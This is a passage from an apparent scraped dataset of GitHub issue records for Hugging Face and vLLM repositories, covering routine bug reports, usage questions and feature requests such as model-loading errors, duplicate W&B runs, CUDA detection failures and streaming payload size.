EncoderDecoderModel(encoder=encoder, decoder=decoder.decoder)\n```\nThis gives me the following error:\n\n```\nValueError: Unrecognized model identifier: t5_gemma_module. Should contain one of aimv2, aimv2_vision_model, albert, align, altclip, apertus, arcee, aria, aria_text, audio-spectrogram-transformer, autoformer, aya_vision, bamba, bark, bart, beit, bert, bert-generation, big_bird, bigbird_pegasus, biogpt, bit, bitnet, blenderbot, blenderbot-small, blip, blip-2, blip_2_qformer, bloom, blt, bridgetower, bros, camembert, canine, chameleon, chinese_clip, chinese_clip_vision_model, clap, clip, clip_text_model, clip_vision_model, clipseg, clvp, code_llama, codegen, cohere, cohere2, cohere2_vision, colpali, colqwen2, conditional_detr, convbert, convnext, convnextv2, cpmant, csm, ctrl, cvt, d_fine, dab-detr, dac, data2vec-audio, data2vec-text, data2vec-vision, dbrx, deberta, deberta-v2, decision_transformer, deepseek_v2, deepseek_v3, deepseek_vl, deepseek_vl_hybrid, deformable_detr, deit, depth_anything, depth_pro, deta, detr, dia, diffllama, dinat, dinov2, dinov2_with_registers, dinov3_convnext, dinov3_vit, distilbert, doge, donut-swin, dots1, dpr, dpt, edgetam, edgetam_video, edgetam_vision_model, efficientformer, efficientloftr, efficientnet, electra, emu3, encodec, encoder-decoder, eomt, ernie, ernie4_5, ernie4_5_moe, ernie_m, esm, evolla, exaone4, falcon, falcon_h1, falcon_mamba, fastspeech2_conformer, fastspeech2_conformer_with_hifigan, flaubert, flava, flex_olmo, florence2, fnet, focalnet, fsmt, funnel, fuyu, gemma, gemma2, gemma3, gemma3_text, gemma3n, gemma3n_audio, gemma3n_text, gemma3n_vision, git, glm, glm4, glm4_moe, glm4v, glm4v_moe, glm4v_moe_text, glm4v_text, glpn, got_ocr2, gpt-sw3, gpt2, gpt_bigcode, gpt_neo, gpt_neox, gpt_neox_japanese, gpt_oss, gptj, gptsan-japanese, granite, granite_speech, granitemoe, granitemoehybrid, granitemoeshared, granitevision, graphormer, grounding-dino, groupvit, helium, hgnet_v2, hiera, hubert, hunyuan_v1_dense, hunyuan_v1_moe, ibert, idefics, idefics2, idefics3, idefics3_vision, ijepa, imagegpt, informer, instructblip, instructblipvideo, internvl, internvl_vision, jamba, janus, jetmoe, jukebox, kosmos-2, kosmos-2.5, kyutai_speech_to_text, layoutlm, layoutlmv2, layoutlmv3, led, levit, lfm2, lfm2_vl, lightglue, lilt, llama, llama4, llama4_text, llava, llava_next, llava_next_video, llava_onevision, longcat_flash, longformer, longt5, luke, lxmert, m2m_100, mamba, mamba2, marian, markuplm, mask2former, maskformer, maskformer-swin, mbart, mctct, mega, megatron-bert, metaclip_2, mgp-str, mimi, minimax, ministral, mistral, mistral3, mixtral, mlcd, mllama, mm-grounding-dino, mobilebert, mobilenet_v1, mobilenet_v2, mobilevit, mobilevitv2, modernbert, modernbert-decoder, moonshine, moshi, mpnet, mpt, mra, mt5, musicgen, musicgen_melody, mvp, nat, nemotron, nezha, nllb-moe, nougat, nystromformer, olmo, olmo2, olmo3, olmoe, omdet-turbo, oneformer, open-llama, openai-gpt, opt, ovis2, owlv2, owlvit, paligemma, parakeet, parakeet_ctc, parakeet_encoder, patchtsmixer, patchtst, pegasus, pegasus_x, perceiver, perception_encoder, perception_lm, persimmon, phi, phi3, phi4_multimodal, phimoe, pix2struct, pixtral, plbart, poolformer, pop2piano, prompt_depth_anything, prophetnet, pvt, pvt_v2, qdqbert, qwen2, qwen2_5_omni, qwen2_5_vl, qwen2_5_vl_text, qwen2_audio, qwen2_audio_encoder, qwen2_moe, qwen2_vl, qwen2_vl_text, qwen3, qwen3_moe, qwen3_next, qwen3_omni_moe, qwen3_vl, qwen3_vl_moe, qwen3_vl_moe_text, qwen3_vl_text, rag, realm, recurrent_gemma, reformer, regnet, rembert, resnet, retribert, roberta, roberta-prelayernorm, roc_bert, roformer, rt_detr, rt_detr_resnet, rt_detr_v2, rwkv, sam, sam2, sam2_hiera_det_model, sam2_video, sam2_vision_model, sam_hq, sam_hq_vision_model, sam_vision_model, seamless_m4t, seamless_m4t_v2, seed_oss, segformer, seggpt, sew, sew-d, shieldgemma2, siglip, siglip2, siglip2_vision_model, siglip_vision_model, smollm3, smolvlm, smolvlm_vision, speech-encoder-decoder, speech_to_text, speech_to_text_2, speecht5, splinter, squeezebert, stablelm, starcoder2, superglue, superpoint, swiftformer, swin, swin2sr, swinv2, switch_transformers, t5, t5gemma, table-transformer, tapas, textnet, tim", "url": "https://github.com/huggingface/transformers/issues/41810", "state": "closed", "labels": [], "created_at": "2025-10-23T08:48:19Z", "updated_at": "2025-12-01T08:02:53Z", "comments": 1, "user": "kushaltatariya" }, { "repo": "huggingface/accelerate", "number": 3818, "title": "Duplicate W&B initialization in offline mode", "body": "### System Info\n\n```Shell\n- `Accelerate` version: 1.10.1\n```\n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nWhen using Accelerate with `wandb` in **offline mode**, two separate W&B runs are created for a single training process.\nThis happens because both the `start` and the `store_init_configuration` method of `WandBTracker` call `wandb.init()`, which leads to redundant initialization. \n\nhttps://github.com/huggingface/accelerate/blob/a12beee389f6bd37cfae0aba233db03f375f7f80/src/accelerate/tracking.py#L318-L325\n\nhttps://github.com/huggingface/accelerate/blob/a12beee389f6bd37cfae0aba233db03f375f7f80/src/accelerate/tracking.py#L343-L350\n\nIs there any plan to refine the duplication?\n\n### Expected behavior\n\ninitialize wandb run only 1 time", "url": "https://github.com/huggingface/accelerate/issues/3818", "state": "closed", "labels": [ "good first issue" ], "created_at": "2025-10-23T02:19:38Z", "updated_at": "2025-12-16T13:10:48Z", "comments": 3, "user": "ShuyUSTC" }, { "repo": "vllm-project/vllm", "number": 27347, "title": "[Usage]: vllm: error: unrecognized arguments: --all2all-backend deepep_low_latency", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.31.6\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.0 (default, Mar 3 2022, 09:58:08) [GCC 7.5.0] (64-bit runtime)\nPython platform : Linux-5.15.0-89-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H200\nGPU 1: NVIDIA H200\nGPU 2: NVIDIA H200\nGPU 3: NVIDIA H200\nGPU 4: NVIDIA H200\nGPU 5: NVIDIA H200\nGPU 6: NVIDIA H200\nGPU 7: NVIDIA H200\n\nNvidia driver version : 570.133.20\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.8.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.8.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0\nOff-line CPU(s) list: 1-191\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8558\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 76%\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 520 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mit", "url": "https://github.com/vllm-project/vllm/issues/27347", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-22T14:36:18Z", "updated_at": "2025-10-22T15:07:13Z", "comments": 1, "user": "Valerianding" }, { "repo": "vllm-project/vllm", "number": 27343, "title": "[Usage]: Can't get result from /pooling api when using Qwen2.5-Math-PRM-7B online", "body": "### Your current environment\n\n```\n\nThe output of `python collect_env.py`\n\nCollecting environment information... [140/1781]\n============================== \n System Info \n============================== \nOS : Ubuntu 22.04.5 LTS (x86_64) \nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0 \nClang version : Could not collect \nCMake version : version 3.22.1 \nLibc version : glibc-2.35 \n \n============================== \n PyTorch Info \n============================== \nPyTorch version : 2.8.0+cu128 \nIs debug build : False \nCUDA used to build PyTorch : 12.8 \nROCM used to build PyTorch : N/A \n \n============================== \n Python Environment \n============================== \nPython version : 3.12.12 | packaged by Anaconda, Inc. | (main, Oct 21 2025, 20:16:04) [GCC 11.2.0] (64-bit runti\nme) \nPython platform : Linux-5.15.0-153-generic-x86_64-with-glibc2.35 \n \n============================== \n CUDA / GPU Info \n============================== \nIs CUDA available : True \nCUDA runtime version : 12.4.99\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA A100 80GB PCIe\nGPU 1: NVIDIA A100 80GB PCIe\nGPU 2: NVIDIA A800 80GB PCIe\nGPU 3: NVIDIA A800 80GB PCIe\nGPU 4: NVIDIA A100 80GB PCIe\nGPU 5: NVIDIA A100 80GB PCIe\nGPU 6: NVIDIA A800 80GB PCIe\nGPU 7: NVIDIA A800 80GB PCIe\n\nNvidia driver version : 550.54.15\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n============================== \n CPU Info \n============================== \nArchitecture: x86_64 \nCPU op-mode(s): 32-bit, 64-bit \nAddress sizes: 46 bits physical, 48 bits virt", "url": "https://github.com/vllm-project/vllm/issues/27343", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-22T13:36:51Z", "updated_at": "2025-10-23T03:39:13Z", "comments": 3, "user": "zgc6668" }, { "repo": "huggingface/transformers.js", "number": 1446, "title": "Zhare-AI/sd-1-5-webgpu on HuggingFace.co lists itself as Transformer.js supported?", "body": "### Question\n\n[Zhare-AI/sd-1-5-webgpu](https://huggingface.co/Zhare-AI/sd-1-5-webgpu) is a `text-to-image` model and is marked as Transformers.js compatible, and even shows demo code using Transformers.js on its `huggingface.co` page. Their example code fails with an error saying `text-to-image` is not supported in Transformers.js.\n\nThe problem is `text-to-image` is not supported in 3.7.6 and does not appear to even be supported in the v4 branch. I asked them on their `huggingface.co` discussions what version of Transformers.js their model is compatible with but no reply yet. Apparently someone else asked them the same thing 18 days ago and never got a reply.\n\nI am very interested adding a Transformers.js demo for `text-to-image` to my Blazor WASM library [SpawnDev.BlazorJS.TransformersJS](https://github.com/LostBeard/SpawnDev.BlazorJS.TransformersJS), but not sure what I am missing.", "url": "https://github.com/huggingface/transformers.js/issues/1446", "state": "closed", "labels": [ "question" ], "created_at": "2025-10-22T12:20:16Z", "updated_at": "2025-10-24T14:33:17Z", "user": "LostBeard" }, { "repo": "vllm-project/vllm", "number": 27336, "title": "[Feature]: Make promt_token_ids optional in streaming response (disable by default)", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nStarting with v0.10.2, the first server-sent event (SSE) in streaming responses now includes the full list of `prompt_token_ids`.\nWhile this can be useful for debugging or detailed inspection, it introduces several practical issues in production environments: \n\n1. Large payload size: \nFor long prompts, this significantly increases the size of the first streaming event. This can increase latency, cause network throttling, and reduce streaming responsiveness.\n\n2. Parser and infrastructure limitations: \nSome clients and intermediate parsers have message size limits. The larger first event may cause them to fail or disconnect, requiring changes across multiple components in existing systems that previously handled smaller initial events.\n\n3. Breaking change in behavior:\nPreviously, streaming responses did not include prompt token IDs, so this change affects compatibility with existing clients expecting smaller events.\n\n\n### Suggested Fix\nMake the inclusion of prompt_token_ids optional per request and disabled by default (same as `return_token_ids`), restoring the previous behavior.\n\n\n### Alternatives\n\nAlternatively, provide an API flag or configuration option to exclude `prompt_token_ids` globally for the entire server, so that no streaming response include this field.\n\n### Additional context\n\nFor example, the first streaming response for a prompt of ~130k tokens can now exceed 600KB, while some parsers and scanners have default buffer sizes of 64KB (which was previously sufficient).\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27336", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-22T11:42:41Z", "updated_at": "2025-10-27T11:06:45Z", "comments": 1, "user": "Gruner-atero" }, { "repo": "huggingface/transformers", "number": 41775, "title": "Hugging Face website and models not reachable", "body": "### System Info\n\n```\n$ pip show transformers\nName: transformers\nVersion: 4.57.1\nSummary: State-of-the-art Machine Learning for JAX, PyTorch and TensorFlow\nHome-page: https://github.com/huggingface/transformers\nAuthor: The Hugging Face team (past and future) with the help of all our contributors (https://github.com/huggingface/transformers/graphs/contributors)\nAuthor-email: transformers@huggingface.co\n```\n\n```\n$ python --version\nPython 3.12.3\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1. `python -c 'from transformers import pipeline; pipeline = pipeline(task=\"text-generation\", model=\"Qwen/Qwen2.5-1.5B\")'`\n\nI am getting connection issues:\n```\nOSError: We couldn't connect to 'https://huggingface.co' to load the files, and couldn't find them in the cached files.\nCheck your internet connection or see how to run the library in offline mode at 'https://huggingface.co/docs/transformers/installation#offline-mode'.\n```\n\nIt rather funny that it recommends checking https://huggingface.co/docs/transformers/installation#offline-mode when https://huggingface.co is not reachable :-) Maybe this information, e.g. about mirrors, could be hosted somewhere else?\n\n### Expected behavior\n\nThe examples should work as documented.", "url": "https://github.com/huggingface/transformers/issues/41775", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-22T07:40:32Z", "updated_at": "2025-11-21T08:10:00Z", "comments": 8, "user": "christian-rauch" }, { "repo": "vllm-project/vllm", "number": 27319, "title": "[Usage]: Quantized FusedMoE crashed in graph compiled stage", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : 19.0.0git (https://github.com/RadeonOpenCompute/llvm-project roc-6.4.3 25224 d366fa84f3fdcbd4b10847ebd5db572ae12a34fb)\nCMake version : version 3.31.6\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+rocm6.4\nIs debug build : False\nCUDA used to build PyTorch : N/A\nROCM used to build PyTorch : 6.4.43482-0f2d60242\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by conda-forge | (main, Jun 4 2025, 14:45:31) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-79-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : AMD Radeon PRO W7900 Dual Slot (gfx1100)\nNvidia driver version : Could not collect\ncuDNN version : Could not collect\nHIP runtime version : 6.4.43482\nMIOpen runtime version : 3.4.0\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 256\nOn-line CPU(s) list: 0-255\nVendor ID: AuthenticAMD\nBIOS Vendor ID: Advanced Micro Devices, Inc.\nModel name: AMD EPYC 9554 64-Core Processor\nBIOS Model name: AMD EPYC 9554 64-Core Processor Unknown CPU @ 3.1GHz\nBIOS CPU family: 107\nCPU family: 25\nModel: 17\nThread(s) per core: 2\nCore(s) per socket: 64\nSocket(s): 2\nStepping: 1\nFrequency boost: enabled\nCPU(s) scaling MHz: 51%\nCPU max MHz: 3100.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 6199.71\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good amd_lbr_v2 nopl nonstop_tsc cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba perfmon_v2 ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local user_shstk avx512_bf16 clzero irperf xsaveerptr rdpru wbnoinvd amd_ppin cppc amd_ibpb_ret arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif x2avic v_spec_ctrl vnmi avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid overflow_recov succor smca fsrm flush_l1d debug_swap\nVirtualization: AMD-V\nL1d cache: 4 MiB (128 instances)\nL1i cache: 4 MiB (128 instances)\nL2 cache: 128 MiB (128 instances)\nL3 cache: 512 MiB (16 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-63,128-191\nNUMA node1 CPU(s): 64-127,192-255\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Mitigation; Safe RET\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: ", "url": "https://github.com/vllm-project/vllm/issues/27319", "state": "closed", "labels": [ "rocm", "usage" ], "created_at": "2025-10-22T06:29:32Z", "updated_at": "2025-10-24T02:19:55Z", "comments": 1, "user": "Rus-P" }, { "repo": "vllm-project/vllm", "number": 27298, "title": "[Doc]: Update metrics documentation to remove V0 references and add v1 changes.", "body": "## Problem\n\nThe metrics documentation in `docs/design/metrics.md` still contains references to V0 metrics implementation, but V0 metrics have been removed after @njhill 's PR https://github.com/vllm-project/vllm/pull/27215 was merged. To avoid confusion, I think we should remove this and update it with the new set of v1 metrics.\n\nWas curious if we want to keep this v0 reference and add the v1 details on top of this. \n\n### Suggest a potential alternative/fix\n\n1. Remove all V0 references from the metrics documentation.\n2. Update the introduction to focus on V1 metrics only.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27298", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-10-21T22:08:48Z", "updated_at": "2025-10-22T13:29:17Z", "comments": 1, "user": "atalhens" }, { "repo": "vllm-project/vllm", "number": 27268, "title": "[Usage]: failed to infer device type on GCP COS despite nvidia container toolkit installed", "body": "### Your current environment\n\nI failed to run this script on GCP COS. \n\n### How would you like to use vllm\n\nI was trying to use VLLM on a Google Cloud (GCP) Container-Optimized OS (COS) instance via Docker. \n\nI followed GCP's [documentation](https://cloud.google.com/container-optimized-os/docs/how-to/run-gpus) to install the nvidia driver, including mapping nvidia driver-related dirs to the Docker container. All tests worked fine. \n\nHowever, when trying to start a VLLM server via Docker, I got the error that `libcuda.so.1` cannot be found and VLLM failed to infer device info. I tried to change the target dirs in the mapping to like `/usr/local/lib`, `/usr/local/cuda/lib`, etc. But no luck. \n\nI also tried adding the flags `--runtime nvidia --gpus all` per [this instruction](https://docs.vllm.ai/en/v0.8.4/deployment/docker.html) but got the error that `Error response from daemon: unknown or invalid runtime name: nvidia.`\n\nIf someone can shed the light of where vllm official Docker image looks for CUDA stuff, it will be greatly appreciated. Thanks in advance. \n\nThe complete command and error: \n```\n$ docker run -v ~/.cache/huggingface:/root/.cache/huggingface --env \"HUGGING_FACE_HUB_TOKEN=\" -p 8010:8000 --ipc=host vllm/vllm-openai:latest --model mistralai/Mistral-7B-v0.1\nINFO 10-21 08:13:18 [__init__.py:220] No platform detected, vLLM is running on UnspecifiedPlatform\nWARNING 10-21 08:13:23 [_custom_ops.py:20] Failed to import from vllm._C with ImportError('libcuda.so.1: cannot open shared object file: No such file or directory')\nTraceback (most recent call last):\n File \"\", line 198, in _run_module_as_main\n File \"\", line 88, in _run_code\n File \"/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/api_server.py\", line 1949, in \n parser = make_arg_parser(parser)\n ^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/entrypoints/openai/cli_args.py\", line 263, in make_arg_parser\n parser = AsyncEngineArgs.add_cli_args(parser)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 1714, in add_cli_args\n parser = EngineArgs.add_cli_args(parser)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 919, in add_cli_args\n vllm_kwargs = get_kwargs(VllmConfig)\n ^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 281, in get_kwargs\n return copy.deepcopy(_compute_kwargs(cls))\n ^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/vllm/engine/arg_utils.py\", line 182, in _compute_kwargs\n default = field.default_factory()\n ^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.12/dist-packages/pydantic/_internal/_dataclasses.py\", line 123, in __init__\n s.__pydantic_validator__.validate_python(ArgsKwargs(args, kwargs), self_instance=s)\n File \"/usr/local/lib/python3.12/dist-packages/vllm/config/device.py\", line 58, in __post_init__\n raise RuntimeError(\nRuntimeError: Failed to infer device type, please set the environment variable `VLLM_LOGGING_LEVEL=DEBUG` to turn on verbose logging to help debug the issue.\n```\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27268", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-21T15:24:21Z", "updated_at": "2025-10-21T15:24:21Z", "comments": 0, "user": "forrestbao" }, { "repo": "vllm-project/vllm", "number": 27265, "title": "[Usage]: Cannot register custom model (Out-of-Tree Model Integration)", "body": "```\n### Your current environment\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flake8==7.1.1\n[pip3] flashinfer==0.1.6+cu124torch2.4\n[pip3] flashinfer-python==0.2.5\n[pip3] mypy-extensions==1.0.0\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.4.5.8\n[pip3] nvidia-cuda-cupti-cu12==12.4.127\n[pip3] nvidia-cuda-nvrtc-cu12==12.4.127\n[pip3] nvidia-cuda-runtime-cu12==12.4.127\n[pip3] nvidia-cudnn-cu12==9.1.0.70\n[pip3] nvidia-cufft-cu12==11.2.1.3\n[pip3] nvidia-curand-cu12==10.3.5.147\n[pip3] nvidia-cusolver-cu12==11.6.1.9\n[pip3] nvidia-cusparse-cu12==12.3.1.170\n[pip3] nvidia-cusparselt-cu12==0.6.2\n[pip3] nvidia-ml-py==12.560.30\n[pip3] nvidia-modelopt==0.31.0\n[pip3] nvidia-modelopt-core==0.31.0\n[pip3] nvidia-nccl-cu12==2.21.5\n[pip3] nvidia-nvjitlink-cu12==12.4.127\n[pip3] nvidia-nvtx-cu12==12.4.127\n[pip3] pynvml==12.0.0\n[pip3] pyzmq==26.2.0\n[pip3] sentence-transformers==3.3.1\n[pip3] torch==2.6.0\n[pip3] torch_memory_saver==0.0.6\n[pip3] torchao==0.9.0\n[pip3] torchaudio==2.6.0\n[pip3] torchdata==0.11.0\n[pip3] torchprofile==0.0.4\n[pip3] torchtext==0.18.0\n[pip3] torchvision==0.21.0\n[pip3] transformer_engine_torch==2.3.0\n[pip3] transformers==4.51.1\n[pip3] triton==3.2.0\n[conda] flashinfer 0.1.6+cu124torch2.4 pypi_0 pypi\n[conda] flashinfer-python 0.2.5 pypi_0 pypi\n[conda] numpy 1.26.4 pypi_0 pypi\n[conda] nvidia-cublas-cu12 12.4.5.8 pypi_0 pypi\n[conda] nvidia-cuda-cupti-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-cuda-nvrtc-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-cuda-runtime-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-cudnn-cu12 9.1.0.70 pypi_0 pypi\n[conda] nvidia-cufft-cu12 11.2.1.3 pypi_0 pypi\n[conda] nvidia-curand-cu12 10.3.5.147 pypi_0 pypi\n[conda] nvidia-cusolver-cu12 11.6.1.9 pypi_0 pypi\n[conda] nvidia-cusparse-cu12 12.3.1.170 pypi_0 pypi\n[conda] nvidia-cusparselt-cu12 0.6.2 pypi_0 pypi\n[conda] nvidia-ml-py 12.560.30 pypi_0 pypi\n[conda] nvidia-modelopt 0.31.0 pypi_0 pypi\n[conda] nvidia-modelopt-core 0.31.0 pypi_0 pypi\n[conda] nvidia-nccl-cu12 2.21.5 pypi_0 pypi\n[conda] nvidia-nvjitlink-cu12 12.4.127 pypi_0 pypi\n[conda] nvidia-nvtx-cu12 12.4.127 pypi_0 pypi\n[conda] pynvml 12.0.0 pypi_0 pypi\n[conda] pyzmq 26.2.0 pypi_0 pypi\n[conda] sentence-transformers 3.3.1 pypi_0 pypi\n[conda] torch 2.6.0 pypi_0 pypi\n[conda] torch-memory-saver 0.0.6 pypi_0 pypi\n[conda] torchao 0.9.0 pypi_0 pypi\n[conda] torchaudio 2.6.0 pypi_0 pypi\n[conda] torchdata 0.11.0 pypi_0 pypi\n[conda] torchprofile 0.0.4 pypi_0 pypi\n[conda] torchtext 0.18.0 pypi_0 pypi\n[conda] torchvision 0.21.0 pypi_0 pypi\n[conda] transformer-engine-torch 2.3.0 pypi_0 pypi\n[conda] transformers 4.51.1 pypi_0 pypi\n[conda] triton 3.2.0 pypi_0 